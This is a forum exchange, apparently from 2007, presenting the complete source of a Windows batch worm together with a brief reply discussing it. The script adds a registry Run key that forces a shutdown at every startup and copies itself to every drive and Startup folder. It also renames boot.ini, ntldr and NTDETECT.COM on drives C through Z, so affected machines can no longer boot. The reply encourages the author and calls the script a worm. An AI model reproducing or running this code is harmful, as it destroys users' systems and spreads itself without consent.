Anatomy of a worm written with plain Windows batch commands


On 8/26/07, Shezan <shezan2k7[at]gmail.com> wrote:
I created it with Notepad. I actually created an MS-DOS .bat file using Notepad and then converted the shezan.bat file to .exe using bat2exe software. It's nothing. I somehow cobbled it together… Check the source code…
@echo off
date 12-16-2020 | time 16:00:47.47

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V Shezan /D "shutdown.exe -f" /f

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V ShezanStart /D "shezan.exe" /f

copy shezan.exe c:
copy shezan.exe d:
copy shezan.exe e:
copy shezan.exe f:
copy shezan.exe g:
copy shezan.exe i:
copy shezan.exe j:
copy shezan.exe k:
copy shezan.exe l:
copy shezan.exe m:
copy shezan.exe n:
copy shezan.exe o:
copy shezan.exe p:
copy shezan.exe q:
copy shezan.exe r:
copy shezan.exe s:
copy shezan.exe t:
copy shezan.exe u:
copy shezan.exe v:
copy shezan.exe w:
copy shezan.exe x:
copy shezan.exe y:
copy shezan.exe z:

copy shezan.exe %windir%
copy shezan.exe "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "D:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "E:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "F:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "G:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "H:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "I:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "J:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "K:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "L:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "M:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "N:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "O:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "P:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Q:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "R:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "S:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "T:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "U:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "V:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "W:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "X:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Y:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Z:\Documents and Settings\All Users\Start Menu\Programs\Startup"

Attrib -h -s c:\boot.ini
ren c:\boot.ini shezan.ini

Attrib -h -s d:\boot.ini
ren D:\boot.ini shezan.ini

Attrib -h -s e:\boot.ini
ren E:\boot.ini shezan.ini

Attrib -h -s f:\boot.ini
ren F:\boot.ini shezan.ini

Attrib -h -s g:\boot.ini
ren G:\boot.ini shezan.ini

Attrib -h -s h:\boot.ini
ren H:\boot.ini shezan.ini

Attrib -h -s i:\boot.ini
ren I:\boot.ini shezan.ini

Attrib -h -s j:\boot.ini
ren J:\boot.ini shezan.ini

Attrib -h -s k:\boot.ini
ren K:\boot.ini shezan.ini

Attrib -h -s l:\boot.ini
ren L:\boot.ini shezan.ini

Attrib -h -s m:\boot.ini
ren M:\boot.ini shezan.ini

Attrib -h -s n:\boot.ini
ren N:\boot.ini shezan.ini

Attrib -h -s O:\boot.ini
ren O:\boot.ini shezan.ini

Attrib -h -s p:\boot.ini
ren P:\boot.ini shezan.ini

Attrib -h -s q:\boot.ini
ren Q:\boot.ini shezan.ini

Attrib -h -s r:\boot.ini
ren r:\boot.ini shezan.ini

Attrib -h -s s:\boot.ini
ren S:\boot.ini shezan.ini

Attrib -h -s t:\boot.ini
ren T:\boot.ini shezan.ini

Attrib -h -s u:\boot.ini
ren u:\boot.ini shezan.ini

Attrib -h -s v:\boot.ini
ren v:\boot.ini shezan.ini

Attrib -h -s w:\boot.ini
ren w:\boot.ini shezan.ini

Attrib -h -s x:\boot.ini
ren X:\boot.ini shezan.ini

Attrib -h -s y:\boot.ini
ren Y:\boot.ini shezan.ini

Attrib -h -s z:\boot.ini
ren Z:\boot.ini shezan.ini

Attrib -h -s c:\ntldr
ren c:\ntldr shezanldr

Attrib -h -s d:\ntldr
ren D:\ntldr shezanldr

Attrib -h -s e:\ntldr
ren E:\ntldr shezanldr

Attrib -h -s f:\ntldr
ren F:\ntldr shezanldr

Attrib -h -s g:\ntldr
ren G:\ntldr shezanldr

Attrib -h -s h:\ntldr
ren H:\ntldr shezanldr

Attrib -h -s i:\ntldr
ren I:\ntldr shezanldr

Attrib -h -s j:\ntldr
ren J:\ntldr shezanldr

Attrib -h -s k:\ntldr
ren K:\ntldr shezanldr

Attrib -h -s l:\ntldr
ren L:\ntldr shezanldr

Attrib -h -s m:\ntldr
ren M:\ntldr shezanldr

Attrib -h -s n:\ntldr
ren N:\ntldr shezanldr

Attrib -h -s O:\ntldr
ren O:\ntldr shezanldr

Attrib -h -s p:\ntldr
ren P:\ntldr shezanldr

Attrib -h -s q:\ntldr
ren Q:\ntldr shezanldr

Attrib -h -s r:\ntldr
ren r:\ntldr shezanldr

Attrib -h -s s:\ntldr
ren S:\ntldr shezanldr

Attrib -h -s t:\ntldr
ren T:\ntldr shezanldr

Attrib -h -s u:\ntldr
ren u:\ntldr shezanldr

Attrib -h -s v:\ntldr
ren v:\ntldr shezanldr

Attrib -h -s w:\ntldr
ren w:\ntldr shezanldr

Attrib -h -s x:\ntldr
ren X:\ntldr shezanldr

Attrib -h -s y:\ntldr
ren Y:\ntldr shezanldr

Attrib -h -s z:\ntldr
ren Z:\ntldr shezanldr

Attrib -h -s c:\NTDETECT.COM
ren c:\NTDETECT.COM SHEZAN.COM

Attrib -h -s d:\NTDETECT.COM
ren D:\NTDETECT.COM SHEZAN.COM

Attrib -h -s e:\NTDETECT.COM
ren E:\NTDETECT.COM SHEZAN.COM

Attrib -h -s f:\NTDETECT.COM
ren F:\NTDETECT.COM SHEZAN.COM

Attrib -h -s g:\NTDETECT.COM
ren G:\NTDETECT.COM SHEZAN.COM

Attrib -h -s h:\NTDETECT.COM
ren H:\NTDETECT.COM SHEZAN.COM

Attrib -h -s i:\NTDETECT.COM
ren I:\NTDETECT.COM SHEZAN.COM

Attrib -h -s j:\NTDETECT.COM
ren J:\NTDETECT.COM SHEZAN.COM

Attrib -h -s k:\NTDETECT.COM
ren K:\NTDETECT.COM SHEZAN.COM

Attrib -h -s l:\NTDETECT.COM
ren L:\NTDETECT.COM SHEZAN.COM

Attrib -h -s m:\NTDETECT.COM
ren M:\NTDETECT.COM SHEZAN.COM

Attrib -h -s n:\NTDETECT.COM
ren N:\NTDETECT.COM SHEZAN.COM

Attrib -h -s O:\NTDETECT.COM
ren O:\NTDETECT.COM SHEZAN.COM

Attrib -h -s p:\NTDETECT.COM
ren P:\NTDETECT.COM SHEZAN.COM

Attrib -h -s q:\NTDETECT.COM
ren Q:\NTDETECT.COM SHEZAN.COM

Attrib -h -s r:\NTDETECT.COM
ren r:\NTDETECT.COM SHEZAN.COM

Attrib -h -s s:\NTDETECT.COM
ren S:\NTDETECT.COM SHEZAN.COM

Attrib -h -s t:\NTDETECT.COM
ren T:\NTDETECT.COM SHEZAN.COM

Attrib -h -s u:\NTDETECT.COM
ren u:\NTDETECT.COM SHEZAN.COM

Attrib -h -s v:\NTDETECT.COM
ren v:\NTDETECT.COM SHEZAN.COM

Attrib -h -s w:\NTDETECT.COM
ren w:\NTDETECT.COM SHEZAN.COM

Attrib -h -s x:\NTDETECT.COM
ren X:\NTDETECT.COM SHEZAN.COM

Attrib -h -s y:\NTDETECT.COM
ren Y:\NTDETECT.COM SHEZAN.COM

Attrib -h -s z:\NTDETECT.COM
ren Z:\NTDETECT.COM SHEZAN.COM

shezan.exe
c:\shezan.exe
d:\shezan.exe
e:\shezan.exe
f:\shezan.exe
g:\shezan.exe
h:\shezan.exe
i:\shezan.exe
j:\shezan.exe
k:\shezan.exe
l:\shezan.exe
m:\shezan.exe
n:\shezan.exe
o:\shezan.exe
p:\shezan.exe
q:\shezan.exe
r:\shezan.exe
s:\shezan.exe
t:\shezan.exe
w:\shezan.exe
x:\shezan.exe
y:\shezan.exe
z:\shezan.exe
exit

BRAVO!!! You've found a great security hole Windows has. It's a security hole because Windows lets the program change certain settings without taking precautions. Have you tested the renaming part of this?
Now listen.. it's nothing near to a virus. It's just malware. A virus needs lots of capabilities to be called a virus: replication, infection, spreading automatically, infecting new PCs through any executable files and many more. It can, though, be called a worm.
Antiviruses detect it as they test in heuristic mode…